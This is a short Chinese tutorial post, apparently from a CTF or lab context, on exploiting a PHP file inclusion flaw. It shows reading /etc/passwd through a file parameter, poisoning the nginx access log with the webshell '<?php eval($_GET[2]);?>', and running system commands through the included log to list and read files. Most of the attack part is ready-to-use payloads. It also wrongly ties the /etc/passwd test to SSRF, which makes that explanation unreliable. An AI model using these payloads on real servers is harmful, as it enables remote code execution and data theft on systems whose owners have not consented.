文件包含漏洞

和文件上传漏洞相关联的就是文件包含漏洞了,这是对于漏洞的进一步利用。这边是一些相对比较基础和常见的上传路径整理和方法,后面会继续更新。

对于文件包含漏洞,找到上传位置是一个比较重要的操作。

首先判断是否可以进行日志注入,判断的条件是是否可以进行ssrf漏洞。

传参/etc/passwd,如果成功,则代表可以进行日志注入

复制代码
?file=/etc/passwd

这里还要知道的是我们访问的网页文件一般默认存放在**/var/www/html**

默认nginx日志文件在/var/log/nginx/access.log

可以直接命令执行即可也可以用webshell后门工具连接

复制代码
<?php eval($_GET[2]);?>

可以直接命令执行即可也可以用webshell后门工具连接

?file=/var/log/nginx/access.log&2=system('ls /var/www/html');phpinfo();

?file=/var/log/nginx/access.log&2=system('tac /var/www/html/fl0g.php');phpinfo();
相关推荐
Goboy31 分钟前
弹窗大战15年祭,零信任iOA的枪口,正对准哪吒的方向盘
安全·程序员·产品
Teamhelper_AR35 分钟前
AR眼镜:工业4.0时代高风险作业的安全守护者
安全·ar
辉盈防爆散热风扇6 小时前
EC 技术赋能:福佑防爆风扇如何平衡安全与节能?
安全
君鼎10 小时前
安全逆向工程学习路线
安全·逆向·网安
清 晨12 小时前
剖析 Web3 与传统网络模型的安全框架
网络·安全·web3·facebook·tiktok·instagram·clonbrowser
jonyleek14 小时前
如何搭建一套安全的,企业级本地AI专属知识库系统?从安装系统到构建知识体系,全流程!
人工智能·安全
还是奇怪15 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
fishwheel18 小时前
Android:Reverse 实战 part 2 番外 IDA python
android·python·安全
pingao14137821 小时前
雨雪雾冰全预警:交通气象站为出行安全筑起“隐形防护网”
安全
kura_tsuki21 小时前
[Linux入门] Linux 远程访问及控制全解析:从入门到实战
linux·服务器·安全